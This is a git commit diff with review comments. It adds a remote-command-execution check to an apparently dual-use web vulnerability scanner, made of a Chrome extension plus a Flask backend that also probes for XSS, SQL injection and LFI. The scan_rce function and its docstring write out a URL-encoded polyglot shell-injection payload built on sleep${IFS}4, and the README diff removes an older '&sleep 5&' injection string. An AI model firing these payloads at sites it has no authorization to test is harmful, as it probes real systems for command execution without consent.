RCE scanner added - TODO: Bugfix

master
swisskyrepo 2016-12-27 22:40:20 +01:00
parent 71b589dbb7
commit 50975cde2d
6 changed files with 71 additions and 9 deletions


@ -33,6 +33,7 @@ function send_target(server, url, deep, impact){
http.onreadystatechange = function() { http.onreadystatechange = function() {
if (http.readyState == XMLHttpRequest.DONE) { if (http.readyState == XMLHttpRequest.DONE) {
http_data = JSON.parse(http.responseText); http_data = JSON.parse(http.responseText);
console.log(http.responseText);
// Notifications and update local storage // Notifications and update local storage
if (http_data.xss != '0'){ if (http_data.xss != '0'){
@ -88,6 +89,23 @@ function send_target(server, url, deep, impact){
})(); })();
} }
if (http_data.rce != '0'){
// Update RCE count
chrome.storage.sync.get(['rce'], function(items) {
chrome.storage.sync.set({'rce': items['rce']+parseInt(http_data.rce)})
});
// Update vulnerabilities URL list
chrome.storage.sync.get(['list'], function(items) {
chrome.storage.sync.set({'list': items['list']+http_data.list})
});
new Notification('New vulnerability detected !', {
icon: 'icon.png',
body: 'RCE on '+extract_domain(unescape(url))
})();
}
} }
} }
http.open("GET", infos, true); http.open("GET", infos, true);
@ -95,7 +113,7 @@ function send_target(server, url, deep, impact){
} }
// Set a clean local storage // Set a clean local storage
chrome.storage.sync.set({'xss': 0, 'sql': 0, 'lfi': 0, 'work': 0, 'list':'' }) chrome.storage.sync.set({'rce':0, 'xss': 0, 'sql': 0, 'lfi': 0, 'work': 0, 'list':'' })
// Launch a scan when the tab change // Launch a scan when the tab change
chrome.tabs.onActivated.addListener(function(activeInfo) { chrome.tabs.onActivated.addListener(function(activeInfo) {
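Review bot: The new RCE branch closes its notification with `})();` (the line after `body: 'RCE on '+extract_domain(unescape(url))`), which calls the freshly constructed Notification object as a function; a Notification instance is not callable, so the notification is displayed and then a TypeError is thrown out of the onreadystatechange handler. The same `})();` sits at the end of the preceding xss branch, so whenever an xss hit is reported in the same response the handler aborts before the new `if (http_data.rce != '0')` block runs and the RCE count is never stored — plausibly the "multiples vulns not added" bug recorded in the README hunk. Change both closers to `});`. The counter update `chrome.storage.sync.set({'rce': items['rce']+parseInt(http_data.rce)})` is a non-atomic read-then-write on shared storage, so two responses arriving close together can overwrite each other's increment; also pass a radix, `parseInt(http_data.rce, 10)`. The `console.log(http.responseText)` added near the top of the handler looks like leftover debugging output; send_target itself starts outside the hunk.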


@ -56,6 +56,7 @@
<li><span id='xss'>0 Cross Site Scripting</span></li> <li><span id='xss'>0 Cross Site Scripting</span></li>
<li><span id='sql'>0 Injection SQL</span></li> <li><span id='sql'>0 Injection SQL</span></li>
<li><span id='lfi'>0 Local File Inclusion</span></li> <li><span id='lfi'>0 Local File Inclusion</span></li>
<li><span id='rce'>0 Remote Commands Execution</span></li>
</ul> </ul>
<span id='total'>Total : 0 vulnerability found</span> <span id='total'>Total : 0 vulnerability found</span>


@ -87,7 +87,7 @@ document.addEventListener('DOMContentLoaded', function() {
getCurrentTab(function(tab) { getCurrentTab(function(tab) {
// Display local storage // Display local storage
chrome.storage.sync.get(['xss','sql','lfi','list','work'], function(items) { chrome.storage.sync.get(['rce', 'xss','sql','lfi','list','work'], function(items) {
// Update start button // Update start button
if (items['work'] == 0){ if (items['work'] == 0){
@ -127,10 +127,11 @@ document.addEventListener('DOMContentLoaded', function() {
); );
// Display vulnerabilities' count // Display vulnerabilities' count
document.getElementById("rce").textContent = items['rce'] + " Remote Commands Execution";
document.getElementById("xss").textContent = items['xss'] + " Cross Site Scripting"; document.getElementById("xss").textContent = items['xss'] + " Cross Site Scripting";
document.getElementById("sql").textContent = items['sql'] + " Injection SQL"; document.getElementById("sql").textContent = items['sql'] + " Injection SQL";
document.getElementById("lfi").textContent = items['lfi'] + " Local File Inclusion"; document.getElementById("lfi").textContent = items['lfi'] + " Local File Inclusion";
document.getElementById("total").textContent = "Total : "+ (items['lfi']+items['xss']+items['sql']) +" vulnerability found"; document.getElementById("total").textContent = "Total : "+ (items['lfi']+items['xss']+items['sql']+items['rce']) +" vulnerability found";
}); });
// Display infos (URL - Server's availability) // Display infos (URL - Server's availability)


@ -84,6 +84,7 @@
<li><span id='xss'>0 Cross Site Scripting</span></li> <li><span id='xss'>0 Cross Site Scripting</span></li>
<li><span id='sql'>0 Injection SQL</span></li> <li><span id='sql'>0 Injection SQL</span></li>
<li><span id='lfi'>0 Local File Inclusion</span></li> <li><span id='lfi'>0 Local File Inclusion</span></li>
<li><span id='rce'>0 Remote Commands Execution</span></li>
</ul> </ul>
</div> </div>


@ -46,11 +46,10 @@ var config_server = "http://127.0.0.1:8000";
- Should detect target in source code.. (list of targets, then launch scan) - Should detect target in source code.. (list of targets, then launch scan)
- Should detect and work with POST requests - Should detect and work with POST requests
- Export function for vulnerabilities - Export function for vulnerabilities
- Add some functions from https://sergeybelove.ru/one-button-scan/result/3004e0b978f19e58e3239087d119742779e1efbc/
- Deep and impact : args['url'],args['deep'],args['impact'] - Deep and impact : args['url'],args['deep'],args['impact']
- Command injection :&sleep 5&'\"0&sleep 5&`' - Launch scan when a button is clicked/ form submitted / page opened via URL - chrome.tabs.onActivated.addListener
- Launch scan when a button is clicked/ form submitted / page opened via URL - Cookies and User Agent in server request
- LFI scan improvement with data: wrapper - BUG multiples vulns not added
## Thanks ## Thanks
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) - Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)


@ -87,6 +87,7 @@ def scan_sql_blind_time(vulns, url, fuzz):
else: else:
print "\t\t\033[94mTime Based SQLi (", name ,") Failed \033[0m for ", fuzz, " with the payload :", payload print "\t\t\033[94mTime Based SQLi (", name ,") Failed \033[0m for ", fuzz, " with the payload :", payload
"""scan_lfi """scan_lfi
Description: will scan every parameter for LFI, checking for the common root:x:0:0 Description: will scan every parameter for LFI, checking for the common root:x:0:0
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
@ -104,6 +105,45 @@ def scan_lfi(vulns, url, fuzz):
print "\t\t\033[94mLFI Failed \033[0m for ", fuzz, " with the payload :", payload, inject print "\t\t\033[94mLFI Failed \033[0m for ", fuzz, " with the payload :", payload, inject
"""scan_rce
Description: use a polyglot vector to detect a RCE based on the response time
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
"""
def scan_rce(vulns, url, fuzz):
""" Some tests of context
$ time (ping -c 3 127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ) - real 0m4.113s
ping: unknown host 127.0.0.1|sleep
4|
$ time (ping -c 3 '127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ') - real 0m4.012s
ping: unknown host 127.0.0.1`#
`"|sleep${IFS}4|";sleep${IFS}4  : commande introuvable
$ time (ping -c 3 "127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ") - real 0m4.008s
;sleep
4  : commande introuvable
"""
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4 "
payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4%20"
# Do a request and check the response time
inject = url.replace(fuzz+"=", fuzz+"="+payload)
time1 = datetime.datetime.now()
content = requests.get(inject).text
time2 = datetime.datetime.now()
diff = time2 - time1
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
# The payload will force a delay of 5s at least.
if diff > 2:
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload
vulns['rce'] += 1
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
else:
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload
""" Route /ping """ Route /ping
Description: Simple ping implementation to check if the server is up via the extension Description: Simple ping implementation to check if the server is up via the extension
""" """
@ -117,7 +157,7 @@ Description: main route for the flask application, every scan is launched from h
""" """
@app.route('/',methods=['GET']) @app.route('/',methods=['GET'])
def index(): def index():
vulns = {'xss': 0, 'sql': 0, 'lfi': 0, 'list':''} vulns = {'rce': 0, 'xss': 0, 'sql': 0, 'lfi': 0, 'list':''}
# Parse requests - extract arguments # Parse requests - extract arguments
args = request.args args = request.args
@ -130,12 +170,14 @@ def index():
# Launch scans # Launch scans
for fuzz in matches: for fuzz in matches:
print "\n---[ New parameter : "+fuzz+" ]---" print "\n---[ New parameter " + fuzz + " for url: " + url + " ]---"
scan_xss(vulns, url, fuzz) scan_xss(vulns, url, fuzz)
scan_lfi(vulns, url, fuzz) scan_lfi(vulns, url, fuzz)
scan_sql_error(vulns, url, fuzz) scan_sql_error(vulns, url, fuzz)
scan_sql_blind_time(vulns, url, fuzz) scan_sql_blind_time(vulns, url, fuzz)
scan_rce(vulns, url, fuzz)
print vulns
# Display results as a json # Display results as a json
return jsonify(vulns) return jsonify(vulns)
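Review bot: In scan_rce the elapsed-time line `diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]` keeps only the seconds-within-the-minute, so a response that takes 60 s or more is reported as fast and the check is skipped; `diff = (time2 - time1).total_seconds()` gives the real duration and also keeps the sub-second part that `.seconds` truncates. The comment `# The payload will force a delay of 5s at least.` does not match the `if diff > 2:` test beneath it; make the comment state the threshold the code actually applies. `requests.get(inject)` has no timeout, so a target that never answers blocks the Flask worker for the rest of the scan — pass `timeout=` (e.g. `timeout=10`, a constructed value to be tuned for the deployment). The `print vulns` added at the end of index() looks like leftover debug output; index() itself starts outside the hunk.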